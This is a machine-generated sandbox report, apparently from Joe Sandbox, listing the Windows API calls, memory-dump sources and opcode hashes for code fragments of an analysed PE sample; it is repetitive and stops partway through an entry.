                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastPointer
                                                                                      • String ID:
                                                                                      • API String ID: 2976181284-0
                                                                                      • Opcode ID: da1cf5c853910478beb69786642fdbe2a060f9c28fd522ae53cb089a3b407638
                                                                                      • Instruction ID: ad73fbc3f5aebaea11dc1345a66e0156516d826c5cb688d8422fae7b206a2142
                                                                                      • Opcode Fuzzy Hash: da1cf5c853910478beb69786642fdbe2a060f9c28fd522ae53cb089a3b407638
                                                                                      • Instruction Fuzzy Hash: 120192717053046BDB349E29EC44767B7E9AB84328F14463FB152D36C1CB39FC088615
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 004098EB
                                                                                      • GetLastError.KERNEL32 ref: 004098F8
                                                                                        • Part of subcall function 004096AA: __EH_prolog.LIBCMT ref: 004096AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileH_prologLastPointer
                                                                                      • String ID:
                                                                                      • API String ID: 4236474358-0
                                                                                      • Opcode ID: a9ee84b3aa34bfa957d5062637af57de7004f3f45503c5de4ce8d99514abb9c1
                                                                                      • Instruction ID: 1ceee39926f18fb92de8af10517213a865aced3923d539b5a4e1767c3df1fcc5
                                                                                      • Opcode Fuzzy Hash: a9ee84b3aa34bfa957d5062637af57de7004f3f45503c5de4ce8d99514abb9c1
                                                                                      • Instruction Fuzzy Hash: 5A01F573221208ABCB18AE569C445AB3769AF82330718823FF925AB3D2C734DC118764
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00425B0B
                                                                                        • Part of subcall function 004259FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,004223AA,?,0000015D,?,?,?,?,00422F29,000000FF,00000000,?,?), ref: 00425A2E
                                                                                      • HeapReAlloc.KERNEL32(00000000,?,00200000,?,?,0043CBE8,004017A1,?,?,?,?,00000000,?,00401378,?,?), ref: 00425B47
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocAllocate_free
                                                                                      • String ID:
                                                                                      • API String ID: 2447670028-0
                                                                                      • Opcode ID: ca04dd5068f28b3db96fc648586cc27dd5cf9ad74feb2f39b00117f1bace7fb0
                                                                                      • Instruction ID: b37030dfb1bee84ad8626f331cc13a275a38dd11491afc5299eb94669e2ec9f4
                                                                                      • Opcode Fuzzy Hash: ca04dd5068f28b3db96fc648586cc27dd5cf9ad74feb2f39b00117f1bace7fb0
                                                                                      • Instruction Fuzzy Hash: FFF0A431711A35A59B213A26BC01E6B3B589F81771B90411BF818962A1DE3CEC0181AD
                                                                                      APIs
                                                                                      • LoadStringW.USER32(?,?,00000200,?), ref: 0040D187
                                                                                      • LoadStringW.USER32(?,?,00000200,?), ref: 0040D19D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString
                                                                                      • String ID:
                                                                                      • API String ID: 2948472770-0
                                                                                      • Opcode ID: f8d4cc0807b759bae040f4e628c3548543ccf32e1f9bea8170ea6682bd642638
                                                                                      • Instruction ID: f64494dd1f026860f9c26b77030d43449cdf87078d33d8449569a59e5d4e1e61
                                                                                      • Opcode Fuzzy Hash: f8d4cc0807b759bae040f4e628c3548543ccf32e1f9bea8170ea6682bd642638
                                                                                      • Instruction Fuzzy Hash: 1AF022327012287BEA209F51AC85F6BBA5AEF05384F00253AFAC4A61A1D6295C1087AC
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 0040FCB3
                                                                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 0040FCBA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$AffinityCurrentMask
                                                                                      • String ID:
                                                                                      • API String ID: 1231390398-0
                                                                                      • Opcode ID: d5e5721974881215e06106a87625e75a2d5b934da910b34c6a586c97154867f4
                                                                                      • Instruction ID: e44540004bef0ff180d4ab2a2d34042a80d92e83f1297f225e1ed134cfb57ea1
                                                                                      • Opcode Fuzzy Hash: d5e5721974881215e06106a87625e75a2d5b934da910b34c6a586c97154867f4
                                                                                      • Instruction Fuzzy Hash: B5E09B32E1410D67DF2886A49C469EF73ADFA042007244177ED06E3A40F938DD095798
                                                                                      APIs
                                                                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00409EF9,?,?,?,00409D92,?,00000001,00000000,?,?), ref: 0040A0D7
                                                                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00409EF9,?,?,?,00409D92,?,00000001,00000000,?,?), ref: 0040A108
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 49067b66027d72ea7aec8980449df9622f8b8ba00028e4d55bcd0deb3ad8bd9a
                                                                                      • Instruction ID: 3d018187d10b2f6eececaaf53ef1bdc2879b5b7f737befbb89de33a98e18d5a9
                                                                                      • Opcode Fuzzy Hash: 49067b66027d72ea7aec8980449df9622f8b8ba00028e4d55bcd0deb3ad8bd9a
                                                                                      • Instruction Fuzzy Hash: 85F0A031280209ABDF115F61EC05BDA776DEB05385F048076BD889A1A1DB36CAA89A98
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText_swprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3011073432-0
                                                                                      • Opcode ID: f1e2b7e74785062605be7e7d32c71690a797ae2cd2e6f1faaa61cc2cafe0828f
                                                                                      • Instruction ID: 9de61da28c5e0a7fbd85b47d52f98c1448f14b6fa6955f6a100a5f5ae7362b7a
                                                                                      • Opcode Fuzzy Hash: f1e2b7e74785062605be7e7d32c71690a797ae2cd2e6f1faaa61cc2cafe0828f
                                                                                      • Instruction Fuzzy Hash: A9F05C3299430CF6E711BBE18C06FDA3F5DA704346F00006BB701A20E2D6B55EA0935E
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,?,00409611,?,?,0040946C), ref: 00409DBD
                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00409611,?,?,0040946C), ref: 00409DEB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      • Opcode ID: d20c1e410623cec59bb51d04dffb52da469d3a5ed4fbc6d2059cd8998daa578d
                                                                                      • Instruction ID: ba18e7a2190bd508ead41dc30a5c542f6a576b79b821afc7d9ed0bc41cc22f24
                                                                                      • Opcode Fuzzy Hash: d20c1e410623cec59bb51d04dffb52da469d3a5ed4fbc6d2059cd8998daa578d
                                                                                      • Instruction Fuzzy Hash: 9EE0223168020D6BDB109F61EC41FEA77ADEF09382F840076BD88D2190DB31CC90AA9C
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00409E08,?,004075A0,?,?,?,?), ref: 00409E24
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00409E08,?,004075A0,?,?,?,?), ref: 00409E50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 4609e21ca204fae76a4fe64b3a18e7cd7223f2b6f9f4b1a96e2e533661862c7e
                                                                                      • Instruction ID: 6cb531cace8c601102c0547e3fd22b9cca56d617da4427f97a6c15f5870cd73f
                                                                                      • Opcode Fuzzy Hash: 4609e21ca204fae76a4fe64b3a18e7cd7223f2b6f9f4b1a96e2e533661862c7e
                                                                                      • Instruction Fuzzy Hash: 74E09B3250025857CB50AB68DC45BDA776CDB097E2F0002B6FD48F32D1D7749D848BD8
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0040F324
                                                                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0040DEC8,Crypt32.dll,?,0040DF4A,?,0040DF2E,?,?,?,?), ref: 0040F346
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystem
                                                                                      • String ID:
                                                                                      • API String ID: 1175261203-0
                                                                                      • Opcode ID: 3cf9d30d0600b657c2fda4a18d578511dd1da80d67c4436d11950088fa62c76c
                                                                                      • Instruction ID: bc06febe091f81de48ca509c123cfcb13b0c613048c2f1cbedbdbe178124ed14
                                                                                      • Opcode Fuzzy Hash: 3cf9d30d0600b657c2fda4a18d578511dd1da80d67c4436d11950088fa62c76c
                                                                                      • Instruction Fuzzy Hash: 43E0927280111867CB10AAA49C05FDB77ACEB093D2F0000B6B948D3000DA74A9808BF8
                                                                                      APIs
                                                                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00418945
                                                                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0041894C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: BitmapCreateFromGdipStream
                                                                                      • String ID:
                                                                                      • API String ID: 1918208029-0
                                                                                      • Opcode ID: 83e8ab2c3678110c70598f4420753996258dee5e195a48e69632c60748c1abc6
                                                                                      • Instruction ID: 89909624a1b8d7dd554cd9a95016278948d52b92a248ea3f840241418157bd5f
                                                                                      • Opcode Fuzzy Hash: 83e8ab2c3678110c70598f4420753996258dee5e195a48e69632c60748c1abc6
                                                                                      • Instruction Fuzzy Hash: FDE06DB1810208EFCB10DF89D9017EABBE8EB08321F10806FE84593300D674AE40DB96
                                                                                      APIs
                                                                                      • GdiplusShutdown.GDIPLUS(?,?,?,0042F79B,000000FF), ref: 004190C7
                                                                                      • CoUninitialize.COMBASE(?,?,?,0042F79B,000000FF), ref: 004190CC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: GdiplusShutdownUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 3856339756-0
                                                                                      • Opcode ID: 1a113437c3dceedd185b35e629c1f1cc6fa90962aca71ec5f45e9c548eb947e1
                                                                                      • Instruction ID: 71d730d636b1eafa09d85fd1c61fbc0685fd2fc5adc72f2c45a79fa5be33e515
                                                                                      • Opcode Fuzzy Hash: 1a113437c3dceedd185b35e629c1f1cc6fa90962aca71ec5f45e9c548eb947e1
                                                                                      • Instruction Fuzzy Hash: 9DE09A325446409FC320DB4CED42B41BBE8FB48B20F00477AB91A83B60CB386800CA89
APIs
  • Part of subcall function 00421D9A: try_get_function.LIBVCRUNTIME ref: 00421DAF
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00420CC4
• ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00420CCF
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
• String ID:
• API String ID: 806969131-0
APIs
Similarity
• API ID: ItemShowWindow
• String ID:
• API String ID: 3351165006-0
APIs
• EnterCriticalSection.KERNEL32(00441E74,?,?,?,?,0040A5A0,?,?,?,?,0042F79B,000000FF), ref: 0040FC42
• LeaveCriticalSection.KERNEL32(00441E74,?,?,?,?,0040A5A0,?,?,?,?,0042F79B,000000FF), ref: 0040FC99
  • Part of subcall function 0040F9D1: ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0040FA05
  • Part of subcall function 0040F9D1: CloseHandle.KERNEL32(?,?), ref: 0040FA1F
  • Part of subcall function 0040F9D1: DeleteCriticalSection.KERNEL32(?), ref: 0040FA38
  • Part of subcall function 0040F9D1: CloseHandle.KERNELBASE(?), ref: 0040FA44
  • Part of subcall function 0040F9D1: CloseHandle.KERNEL32(?), ref: 0040FA50
Similarity
• API ID: CloseCriticalHandleSection$DeleteEnterLeaveReleaseSemaphore
• String ID:
• API String ID: 3265325312-0
APIs
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• __EH_prolog.LIBCMT ref: 00408210
  • Part of subcall function 0040137E: __EH_prolog.LIBCMT ref: 00401383
  • Part of subcall function 0040137E: new.LIBCMT ref: 004013FB
  • Part of subcall function 004019B1: __EH_prolog.LIBCMT ref: 004019B6
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• __EH_prolog.LIBCMT ref: 0041948A
  • Part of subcall function 0040137E: __EH_prolog.LIBCMT ref: 00401383
  • Part of subcall function 0040137E: new.LIBCMT ref: 004013FB
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
  • Part of subcall function 00425A8D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042634D,00000001,00000364,?,00422213,?,?,0043CBE8), ref: 00425ACE
• _free.LIBCMT ref: 00428F50
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042634D,00000001,00000364,?,00422213,?,?,0043CBE8), ref: 00425ACE
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,004223AA,?,0000015D,?,?,?,?,00422F29,000000FF,00000000,?,?), ref: 00425A2E
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 698dc16daf4de740024d650acdf0c23e886e09e3adcc5b064b64719c5812390d
                                                                                      • Instruction ID: 193a09e99a823dc9f5ed50a7790da7e9af240f2ff9c1813c472600489ddbe92e
                                                                                      • Opcode Fuzzy Hash: 698dc16daf4de740024d650acdf0c23e886e09e3adcc5b064b64719c5812390d
                                                                                      • Instruction Fuzzy Hash: 37E06531301A306BE6313B66BC4775B7648AF513A9F954327AC1696691DB7CCC0141AD
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00405B3A
                                                                                        • Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: b2d203d5d9bb0afb54967f970ac4d14708f46cbac61f2b33956734aadbf31f7a
                                                                                      • Instruction ID: 03d483851eda3f5c3b18e65868f844c0f664e5856fcedb49f3d645a8770d5f5f
                                                                                      • Opcode Fuzzy Hash: b2d203d5d9bb0afb54967f970ac4d14708f46cbac61f2b33956734aadbf31f7a
                                                                                      • Instruction Fuzzy Hash: B701A230904684DAD714EBA4D4553DDF7E49F55308F0080BFA86923282CBB82B08D766
                                                                                      APIs
                                                                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0040A174
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseFind
                                                                                      • String ID:
                                                                                      • API String ID: 1863332320-0
                                                                                      • Opcode ID: 6e037bec7c8faf0fa4471394a06cd2b555b7003f221a13a620d25ceb633e770a
                                                                                      • Instruction ID: 342afe23466f2a0cf8b4910bae50f53806f2c7d9b3a92f135e198fdb4c20c535
                                                                                      • Opcode Fuzzy Hash: 6e037bec7c8faf0fa4471394a06cd2b555b7003f221a13a620d25ceb633e770a
                                                                                      • Instruction Fuzzy Hash: 14F0E931408380EECE225BB48805BCB7B915F16335F048A5FF1FD262D2C27D5895972B
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00401E93
                                                                                        • Part of subcall function 004018F6: __EH_prolog.LIBCMT ref: 004018FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: f4b95f795a4a9e7bb1fa40c164edd87f2d664019cfc0e9f8fc997cb520b003b7
                                                                                      • Instruction ID: 4a9958e207991fd40c09fc0f131d62f11409f7dfcc7952c7cfdd1f353044b825
                                                                                      • Opcode Fuzzy Hash: f4b95f795a4a9e7bb1fa40c164edd87f2d664019cfc0e9f8fc997cb520b003b7
                                                                                      • Instruction Fuzzy Hash: 10F0D4B1D002998ECF40EFA8D8456EEBBF1AB18304F0441BFD409E7252E73846058B95
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00401E93
                                                                                        • Part of subcall function 004018F6: __EH_prolog.LIBCMT ref: 004018FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                      • Instruction ID: fc545afdcc2d5595fc623333c6e9a4a0b399b63869f817c8b8636fdb1a20c923
